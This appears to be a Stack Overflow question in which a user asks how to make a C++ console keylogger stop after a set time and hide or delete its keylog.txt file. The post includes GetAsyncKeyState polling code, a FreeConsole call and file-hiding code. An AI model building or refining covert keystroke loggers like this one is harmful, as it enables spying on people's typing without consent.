# How to create a console application that automatically EXIT an endless loop after 20 seconds

Tags: c++, api, console, keylogger

I just created a console based keylogger application. Since my keylogger application is an endless loop (never closes), I wonder if I can make the keylogger automatically terminates itself after 20 seconds.

```
while (true)
{
    for (key = 8; key <= 190; key++) // ascii code
    {
        if (GetAsyncKeyState(key) == -32767)
            if (KeyIsListed(key) == FALSE)
                {
                    ofstream logfile;
                    logfile.open("keylog.txt", fstream::app);
                    logfile << key;
                    logfile.close();
                }
    }
}
```

Based on your suggestion, this is what I changed so far

```
FreeConsole(); 

char key;

//time_t future = time(NULL) + 3; // exit after 3 seconds
clock_t start = clock();

while (true)
{
    if (((clock() - start) / CLOCKS_PER_SEC) >= 3) // if (time(NULL) > future)
    {
        DWORD attributes = GetFileAttributes("keylog.txt");
        SetFileAttributes("keylog.txt", attributes + FILE_ATTRIBUTE_HIDDEN);
        // remove("keylog.txt");
        break;
    }
    for (key = 8; key <= 190; key++) // ascii code
    {
        if (GetAsyncKeyState(key) == -32767)
            if (KeyIsListed(key) == FALSE)
                {
                    ofstream logfile;
                    logfile.open("keylog.txt", fstream::app);
                    logfile << key;
                    logfile.close();
                }
    }
}
exit(0);
```

I checked the Task Manager after 3 seconds and the keylogger still ran in the background.

Also, how can I remove keylog.txt or set keylog.txt hidden upon terminating the program?

Comment: Do you know how to get the current time? For example using the [`std::time`](http://en.cppreference.com/w/cpp/chrono/c/time) function?

Comment: Check this one https://stackoverflow.com/questions/45941512/exit-a-c-loop-after-defined-amount-of-time and this one https://stackoverflow.com/questions/2808398/easily-measure-elapsed-time

Comment: Besides, you are doing it wrong: ``GetAsyncKeyState(key) == -32767``

Comment: I updated my code and used both time() and clock(), but my keylogger didn't terminate itself. Also how do I remove keylog.txt or set keylog.txt hidden?

Comment: @Someprogrammerdude I updated my code, would you please take a look at it?

Comment: Perhaps it's time you [learn how to debug your programs](https://ericlippert.com/2014/03/05/how-to-debug-small-programs/)?

Comment: I spent hours debugging it, but I couldn't figure out the solutions. If you don't want to give me a solution, could you give me some hints where this program went wrong?